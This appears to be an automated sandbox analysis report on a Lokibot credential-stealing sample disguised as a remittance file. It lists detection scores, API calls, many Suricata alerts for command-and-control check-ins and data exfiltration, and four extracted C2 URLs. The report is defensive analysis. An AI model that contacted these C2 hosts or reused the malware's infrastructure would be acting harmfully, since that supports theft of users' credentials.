            Source: 2.2.svchost.exe.400000.0.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
            Source: Remittance_CT022024.exeReversingLabs: Detection: 31%
            Source: Remittance_CT022024.exeVirustotal: Detection: 30%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Remittance_CT022024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: wntdll.pdbUGP source: Remittance_CT022024.exe, 00000000.00000003.2058088038.0000000003840000.00000004.00001000.00020000.00000000.sdmp, Remittance_CT022024.exe, 00000000.00000003.2055835797.00000000036A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Remittance_CT022024.exe, 00000000.00000003.2058088038.0000000003840000.00000004.00001000.00020000.00000000.sdmp, Remittance_CT022024.exe, 00000000.00000003.2055835797.00000000036A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3286250258.0000000000B11000.00000020.00000001.01000000.00000005.sdmp
            Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3286250258.0000000000B11000.00000020.00000001.01000000.00000005.sdmp
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0079445A
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079C6D1 FindFirstFileW,FindClose,0_2_0079C6D1
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0079C75C
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0079EF95
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0079F0F2
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0079F3F3
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007937EF
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00793B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00793B12
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0079BCBC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49710 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49710 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49764 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49764 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49764 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49710 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49710 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49710 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49759 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49759 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49717 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49759 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49713 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49764 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49713 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49716 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49764 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49712 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49712 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49712 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49713 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49796 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49771 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49808 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49713 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49759 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49796 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49759 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49707 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49733 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49808 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49808 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49713 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49712 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49808 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49808 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49720 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49707 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49790 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49790 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49790 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49777 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49802 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49802 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49802 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49802 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49869 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49802 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49733 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49869 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49869 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49848 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49848 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49848 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49848 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49848 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49790 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49796 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49869 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49869 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49706
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49716 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49796 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49777 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49777 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49796 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49840 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49716 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49790 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49717
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49777 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49722 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49840 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49722 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49722 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49840 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49777 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49722 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49722 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49802
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49840 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49714 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49764
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49716
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49848
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49840 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49712 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49856 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49835 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49856 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49856 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49835 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49835 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49722
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49856 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49856 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49835 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49711
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49869
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49919 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49919 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49777
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49759
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49919 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49835 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49708 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49713
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49712
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49919 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49856
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49919 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49925 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49925 -> 104.21.48.1:80
